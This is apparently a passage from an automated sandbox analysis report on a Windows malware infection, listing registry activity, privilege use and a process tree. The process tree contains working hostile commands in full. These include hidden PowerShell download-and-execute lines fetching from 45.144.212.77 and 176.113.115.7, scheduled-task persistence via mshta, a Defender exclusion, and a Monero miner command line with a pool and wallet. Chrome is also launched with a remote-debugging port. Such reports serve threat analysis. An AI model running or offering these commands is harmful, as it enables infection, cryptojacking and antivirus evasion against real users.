| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{ADD3E05B-390C-43B1-9059-D68C9BA7D6FA} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{3B208D04-42E4-4A9E-9D5D-4621314044E3} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe
"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES981.tmp" "c:\Users\Admin\AppData\Local\Temp\31xayw5v\CSC124C6D5AD9C742CBB436A684BDC2DF.TMP"
C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
"C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "cdohBmas9nm" /tr "mshta \"C:\Temp\ScsxbnLrP.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\ScsxbnLrP.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\dxukjxx\gmgc.exe
C:\ProgramData\dxukjxx\gmgc.exe
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3932 -ip 3932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 788
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5068 -ip 5068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 792
C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAF5.tmp\FAF6.tmp\FAF7.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\2CsAdXyX\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe
"C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb2373cc40,0x7ffb2373cc4c,0x7ffb2373cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2148 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
